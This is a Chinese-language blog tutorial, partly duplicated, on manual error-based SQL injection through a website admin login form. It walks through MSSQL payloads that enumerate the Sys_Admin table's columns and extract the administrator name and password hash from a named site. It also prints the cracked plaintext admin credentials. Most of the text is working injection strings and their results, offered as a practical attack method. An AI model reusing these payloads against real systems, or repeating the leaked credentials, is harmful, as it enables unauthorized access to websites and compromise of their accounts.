后台post注入爆密码
2014-12-19 11:32
239 查看
后台登陆框post注入按照注入的方式属于post,和前台搜索型post注入、文本框注入类似,由于目前主流的注 入工具除了穿山甲等较新工具以外几乎都是get注入,尤其是对于这种后台账户型post注入式无能为力的,所以手工注入就显得尤为重要了,今天就用实战说 明一下大家不大在意的post注入的手注方法。(以后也会补充一个cookie注入的实战例子) http://www.yunsec.net/login.aspx
1.爆数据库的表段和相关字段
说明有表名叫 Sys_Admin 字段有 password
2.爆Sys_Admin下的其他字段。
失败。
3 换种方式爆Sys_Admin表段的其他字段
这就是我们一开始就和表段一起爆出来的密码字段。
在将 nvarchar 值 'Name' 转换成数据类型 int 时失败。
由结果可以推断管理员账户是在name字段中,密码是在password字段中。
4.然后就是分别爆字段内容了
所以爆出来的是admin
爆出来的密码是 D14E21B3210EF7C7EB42EC9740A1EE7E
经过破解是:pjxh3100312
所有后台账户和密码是 admin pjxh3100312
经过分析还有实例联系说明,手工注入的方法不能死板,可以多种方法结合一起使用,学习多种数据库的使用是非常有必要的。
1.爆数据库的表段和相关字段
' having 11=1--
说明有表名叫 Sys_Admin 字段有 password
2.爆Sys_Admin下的其他字段。
' group by Sys_Admin.Password having 11=1--不知道为何没法用这种方式继续爆表段的其他字段
失败。
3 换种方式爆Sys_Admin表段的其他字段
1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),1) from Sys_Admin)) and '1'='1
1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),2) from Sys_Admin)) and '1'='1
这就是我们一开始就和表段一起爆出来的密码字段。
1' and 1=convert(int,(select top 1 col_name(object_id ('Sys_Admin'),3) from Sys_Admin)) and '1'='1
在将 nvarchar 值 'Name' 转换成数据类型 int 时失败。
由结果可以推断管理员账户是在name字段中,密码是在password字段中。
4.然后就是分别爆字段内容了
' and (select top 1 Sys_Admin.Name from Sys_Admin)>0--
所以爆出来的是admin
' and (select top 1 Sys_Admin.Password from Sys_Admin)>0--
爆出来的密码是 D14E21B3210EF7C7EB42EC9740A1EE7E
经过破解是:pjxh3100312
所有后台账户和密码是 admin pjxh3100312
经过分析还有实例联系说明,手工注入的方法不能死板,可以多种方法结合一起使用,学习多种数据库的使用是非常有必要的。
相关文章推荐
- 通过后台登入界面拿到管理员帐号密码-post注入
- 后台登陆框post注入
- 后台登陆框post注入实战
- 后台登陆框post注入实战
- 修改phpmyadmin密码后,weiphp后台一直无法登录,post not found
- 后台用户名不存在,密码被修改,spider,新漏洞轻松注入改后台密码
- 对一个web渗透 后台登陆框post提交注入 报错类型 (小刀)
- burp结合sqlmap进行后台登录框post注入
- aspx后台登陆框post注入实战
- httpclient发送post/get请求,Java后台怎么接受
- Android APP 进入后台开启手势密码页面
- ECSHOP忘记后台密码怎么办?
- asp后台万能密码
- 使用java ssm框架后台模拟post上传文件并提交表单数据
- 后台防止XSS注入,禁止JS获取COOKIE
- PHPCMS后台密码忘记解决办法
- 使用burpsuite爆破后台账号密码
- C#实现京东登录密码加密POST
- ecshop后台帐号密码忘记了怎么办?
- 如何设置java后台接收get或者post请求